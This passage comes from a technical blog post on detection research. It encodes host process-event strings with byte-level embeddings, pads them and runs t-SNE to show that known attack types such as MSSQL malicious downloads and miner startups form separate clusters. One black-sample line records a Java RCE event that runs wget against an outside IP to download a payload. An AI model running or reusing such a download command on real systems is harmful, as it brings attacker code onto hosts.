0.46645567, -0.09506886, -0.88337237, 0.4423233 , -0.04276608, -0.68785369, 0.65162164, 0.77287203, 0.05476238, 0.13921039, 0.29394913, -0.0168863 , -0.10819948, 0.44322544, 0.33779156, -0.19596539, -0.55141109, -0.43966341, -0.19100747, 0.04682292, -0.29034454, -0.16880336, 0.33538333, -0.08784363, 0.00695483, -0.19887839, 0.05808999, -0.67197174, -0.85905921, -0.70650107, 0.85683334, -0.23631249, 0.22308137, 0.0542624 , -0.00771852, 0.97673041, 0.88210982, -0.15178144, 0.2150249 , -0.04681296, 0.01033337, -0.2487212 , -0.46819308, 0.76578599, 0.55684632, -0.22454378, 0.22623067, 0.08395205, -0.62710893, 0.12755015, -0.49221697, 0.61037868, 1.25903904, -0.36791909, 0.03496601] ... 
3 -> [ -3.70845467e-01, 3.93410563e-01, 1.60593450e+00, 5.46287537e-01, 2.65109837e-01, -1.31787658e+00, -2.13675663e-01, -5.61035089e-02, -1.01826203e+00, -1.58931267e+00, 4.14101988e-01, -1.03291249e+00, 2.00901225e-01, -1.12422717e+00, 1.27530649e-01, -2.13747287e+00, 1.42055678e+00, -5.73803127e-01, -2.12872148e-01, 4.18091603e-02, -1.33366489e+00, -4.95041192e-01, -6.93559170e-01, -6.06829599e-02, 1.09784222e+00, -5.34380198e-01, -5.68631113e-01, 8.45929921e-01, 1.29352260e+00, 4.67340618e-01, -6.36335313e-01, -9.85392511e-01, -1.22497571e+00, -4.07338351e-01, -4.20602500e-01, -1.08226681e+00, 7.43993104e-01, 1.12883520e+00, 3.43645923e-02, -5.94541319e-02, 7.66032517e-01, -1.93675250e-01, 1.82689798e+00, 1.67646158e+00, -1.59705853e+00, 2.41715424e-02, 1.81469107e+00, -1.44575167e+00, -2.93559004e-02, 3.66339445e-01, 7.67972529e-01, -8.21247458e-01, -9.42183554e-01, 1.55157781e+00, -1.47846460e+00, -6.96344137e-01, -2.64094532e-01, 1.06264758e+00, -3.67395170e-02, 1.72482407e+00, -5.05911075e-02, -2.62147963e-01, -1.09699607e+00, 1.20745230e+00, -7.97679842e-01, 6.39184788e-02, 5.30795306e-02, 7.05267251e-01, -5.43238878e-01, -1.41232789e+00, 9.44538295e-01, 9.84270215e-01, -5.90061732e-02, -8.03461019e-03, 9.54896510e-01, 6.28633201e-01, 1.47355640e+00, 3.32847685e-01, 1.25698006e+00, 3.00440729e-01, 1.68355942e-01, -1.15184975e-03, -9.03676748e-01, 1.59518972e-01, 4.66192305e-01, 4.71340299e-01, 1.43235922e+00, 3.15574020e-01, 2.08510295e-01, -7.10310936e-01, 1.32493779e-01, 5.26068032e-01, 5.99716604e-02, -4.47126776e-01, -6.82992280e-01, 8.34315181e-01, -6.40793145e-01, 1.92409777e-03, 1.03552985e+00, 8.87790501e-01] ]
What we obtain this way is a (str_len, vocabulary embedding dimension) tensor, which we reduce with reduce_sum
vectorlist = list(tf.reduce_sum(line_vector, 1).eval())
This yields a vector of dimension (str_len). Note the dimension conversion during encoding: we embed at the byte level, encode the proc event string byte by byte, and then reduce with reduce_sum; the embedding vector obtained this way still preserves spatial correlation
1-DOWNLOAD_SUSPICIOUS_FILE_BY_JaveRCE /alidata/server/java-1.7.0/jre/bin/java--->wget http://122.114.14.177:443/0233 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 12.1349 14.2279 5.16538 9.30907 0.888179 14.2279 11.5367 14.2279 12.1349 7.97812 0.798266 10.6592 -1.25509 0.798266 10.6592 12.1349 -10.7113 14.2279 -1.25509 14.2279 10.5875 -8.16522 7.85385 -6.67422 7.85385 -11.5012 12.1349 -10.7113 10.6592 0.798266 12.1349 -0.941776 9.30907 4.77936 12.1349 -10.7113 14.2279 -1.25509 14.2279 10.5875 10.5875 10.5875 5.20662 2.31166 10.202 0.798266 11.5367 9.20893 4.07447 11.5367 11.5367 6.14633 9.92074 12.1349 12.1349 -8.16522 -4.42483 -4.42483 7.85385 -8.16522 -8.16522 -2.93291 7.85385 -8.16522 -2.93291 7.85385 -8.16522 -6.67422 -6.67422 9.92074 -2.93291 -2.93291 2.37211 12.1349 -11.5012 -4.42483 2.37211 2.37211
One more issue: every proc event string has a different length, so the reduced (str_len)-dimensional vectors cannot form a matrix, blocking subsequent neural-network training and t-SNE projection. We therefore pad the low dimensions of each vector. We choose to pad the low dimensions because an object's useful information tends to concentrate in the middle and high dimensions (for example, the volume of a high-dimensional ball concentrates near its surface), so padding the low dimensions does not hurt classification accuracy much; a sketch of the encode-and-pad step follows
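A hedged NumPy sketch of the encode-and-pad step described above, assuming a char_vectors dict mapping each printable character to its embedding (np.ndarray) with '*' covering non-printable ones; the names and the 200-byte width are illustrative.

import numpy as np

def encode_event(event, char_vectors, width=200):
    rows = [char_vectors.get(c, char_vectors['*']) for c in event[:width]]
    v = np.sum(np.array(rows), axis=1)            # reduce_sum over the embedding axis
    return np.pad(v, (width - len(v), 0))          # pad the low dimensions with zeros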
Our goal is to observe whether our input data set itself has some spatial topological structure, so we need a labeled data set (both black and white samples) containing a certain variety of data. In practice, though, we hit a problem. For black samples (known attack patterns) we have clear labels, but for the huge volume of white samples we do not know how to assign labels. In unsupervised clustering, missing labels would not harm the final goal, but in t-SNE, without labels we cannot visually see which class has been separated from which, so in the end I decided to use only black samples for the dimensionality-reduction visualization

The result after t-SNE reduction is shown below

On the 2-D plane, the different kinds of event proc strings are separated, to a degree, into different groups; let's zoom in on one detail

t-SNE spatially separated the events of MSSQL downloading malicious files from the events of mining programs starting up
Relevant Link:
http://www.datakit.cn/blog/2017/02/05/t_sne_full.html
https://github.com/karpathy/tsnejs
https://lvdmaaten.github.io/tsne/
https://www.tensorflow.org/versions/r0.12/how_tos/summaries_and_tensorboard/
http://projector.tensorflow.org/
http://distill.pub/2016/misread-tsne/
https://nlp.stanford.edu/projects/glove/
http://nlp.yvespeirsman.be/blog/visualizing-word-embeddings-with-tsne/
https://www.quora.com/How-do-I-visualise-word2vec-word-vectors
http://nadbordrozd.github.io/blog/2016/05/20/text-classification-with-word2vec/
http://minimaxir.com/2017/04/char-embeddings/
Copyright (c) 2017 LittleHann All rights reserved




